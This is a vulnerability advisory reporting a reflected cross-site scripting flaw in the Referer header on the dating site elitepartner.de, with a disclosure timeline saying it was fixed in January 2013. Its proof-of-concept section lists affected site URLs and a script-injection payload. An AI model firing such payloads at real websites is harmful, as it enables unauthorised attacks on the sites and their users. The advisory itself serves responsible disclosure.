SSCHADV2012-024 - elitepartner.de Cross-site Scripting vulnerability
Advisory:          www.elitepartner.de – Cross-site Scripting vulnerability
Advisory ID:       SSCHADV2012-024
Author:            Stefan Schurtz
Affected Software: Successfully tested on www.elitepartner.de
Vendor URL:
Vendor Status:     fixed
======================
Vulnerability Description
======================
http://www.elitepartner.de is prone to a reflected cross-site scripting (XSS) vulnerability: the value of the HTTP Referer request header is written into the response page without HTML encoding, so an attacker-controlled Referer can break out of the surrounding markup and inject script.
======================
PoC-Exploit
======================
Request any of the following URLs with the Referer header set to the payload shown below; the header value is reflected unencoded into the response and the injected script executes:
http://www.elitepartner.de/km/gfx/starthomepage/
http://www.elitepartner.de/km/static/js/jquery/
http://www.elitepartner.de/km/gfx/
http://www.elitepartner.de/km/static/
http://www.elitepartner.de/km/js/
http://www.elitepartner.de/km/static/js/omniture/
http://www.elitepartner.de/km/static/js/
Referer: '"></style></script><script>alert(/huh/)</script>
======================
Solution
======================
fixed
======================
Disclosure Timeline
======================
23-Dec-2012 – informed by contact form
10-Jan-2013 – fixed by developer
======================
Credits
======================
Vulnerability found and advisory written by Stefan Schurtz.
======================
References
======================
http://www.darksecurity.de/advisories/2012/SSCHADV2012-024.txt